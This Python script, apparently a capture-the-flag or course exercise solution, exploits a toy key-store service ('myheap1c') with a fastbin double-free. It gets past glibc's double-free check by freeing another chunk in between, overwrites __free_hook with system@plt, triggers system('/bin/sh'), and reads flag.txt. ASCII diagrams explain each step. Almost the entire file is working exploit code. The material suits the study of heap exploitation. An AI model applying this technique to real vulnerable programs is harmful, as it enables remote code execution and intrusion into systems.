import sys
import struct
import socket

def p(a):
    return struct.pack('Q', a)

# this version contains an integrity check, namely, the free() function will
# abort if we try to free the same chunk which is already at the head its
# fastbin list. In our case, the process would be aborted at the second 'dA'
# operation. This check (taken from the actual GNU libc) can be easily
# circumvented if we free a different chunk between the two 'dA' operations.

host = sys.argv[1] if len(sys.argv) > 1 else 'localhost'
port = 4467

# nm myheap1c | grep __free_hook
free_hook = 0x407070
system_plt = 0x401090

s = socket.create_connection((host, port))
# allocate a first key
s.send(b'aA' + b'A'*8)
# allocate a second key
s.send(b'aE' + b'E'*8)
# delete A a first time
s.send(b'dA')
# delete E, putting it at the head of the fastbin list
s.send(b'dE')
#
# The fastbin list is now as follows:
#
#  |   fastbin    |              E                        A                                  
#  +--------------+       +---------------+        +---------------+                         
#  |              |-----> |               |   +--> |               |                         
#  +--------------+       +---------------+   |    +---------------+                         
#  |              |       |               |   |    |               |                         
#                         +---------------+   |    +---------------+                         
#                      fd |               |---+    |     NULL      |                  
#                         +---------------+        +---------------+                         
#                         |               |        |               |                         
#                         ~     ...       ~        ~     ...       ~                         
#                         |               |        |               |
#                         +---------------+        +---------------+
#
# delete A a second time. The integrity check will not detect anything
# wrong, since the head of the list is E and we are deleting A.
s.send(b'dA')
#
# Now the list becomes
#                                                                              
#                     +-----------------------------------------------+         
#                     |                                               |         
#                   +--------------------------+                      |      
#  |   fastbin    | | |          E             |          A           |                      
#  +--------------+ | |   +---------------+    +-> +---------------+  |                      
#  |              |-+ +-> |               |   +--> |               |  |                      
#  +--------------+       +---------------+   |    +---------------+  |                      
#  |              |       |               |   |    |               |  |                      
#                         +---------------+   |    +---------------+  |                      
#                      fd |               |---+    |               |--+               
#                         +---------------+        +---------------+                         
#                         |               |        |               |                         
#                         ~     ...       ~        ~     ...       ~                         
#                         |               |        |               |
#                         +---------------+        +---------------+
#
# And we still have a loop: fastbin -> A -> E -> A -> ...
#
# create a new key (where A was stored) and overwrite 'fd'
s.send(b'aB' + p(free_hook - 16))
# create a second key to skip the old E
s.send(b'aF' + b'f'*8)
# create a third key (overlapping the old A and now B) to copy 'fd' into the
# fastbin head.  We also use this key to hold the command that we want to
# execute
s.send(b'aC' + b'/bin/sh\0')
# create a fourth key. The key contents will overwrite __free_hook
s.send(b'aD' + p(system_plt))
# now we delete the 'C' key. This will result into system("/bin/sh").
s.send(b'dC')
# now we are talking to a shell. Let it send us the flag.
s.send(b'/bin/cat flag.txt\n')
sys.stdout.buffer.write(s.recv(500))
